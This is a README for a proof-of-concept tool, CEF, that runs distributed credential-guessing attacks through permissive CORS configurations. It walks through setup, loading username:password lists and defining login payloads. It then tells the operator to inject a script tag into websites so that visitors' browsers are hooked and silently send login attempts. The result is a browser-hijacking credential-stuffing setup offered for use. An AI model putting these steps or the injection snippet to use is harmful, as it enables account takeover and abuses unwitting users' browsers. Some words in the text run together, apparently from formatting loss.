A proof-of-concept tool for conducting distributed exploitation of permissive CORS configurations.
-
Install Redis and Python 3.
-
Clone this repository.
-
Install the dependencies.
pip install -r requirements
-
Set the
FILES_DIRconfiguration item incef/__init__.pyto a directory that contains lists of credentials.- Credentials *MUST* be in
username:passwordformat.
- Credentials *MUST* be in
-
Initialize the database in a Python interactive shell.
import cef cef.init_db() -
Launch Redis.
$ redis-server
-
Launch CEF.
$ gunicorn cef:app --worker-class gevent --bind 127.0.0.1:8888
- Add an attack. Pay special attention to the payload expression field. This field requires a python expression that leverages the
u(username) andp(password) variables to return the payload for the request. It should look something likejson.dumps({'email':u,'password':p}). - Add lists to the previously configured directory. Obviously, this requires access to the server's file system.
- Queue up the attack by pressing the "run attack" button. The status will update showing the number of queued requests, but nothing is happening... yet.
- Hook remote browsers to do the work for you. Any request for a file at the web root with the extension of
.jswill return the "hook" file that will turn an exposed browser into a stream-fed request node. Therefore, the code you'd want to embed (or inject) in a site would be something like<script src="http://127.0.0.1:8888/cdscds.js"></script>. - View the results panel for successful credential guesses. The dashboard uses Vue.js on the front end, so there is no need to refresh the page. Everything is rendered dynamically by the client.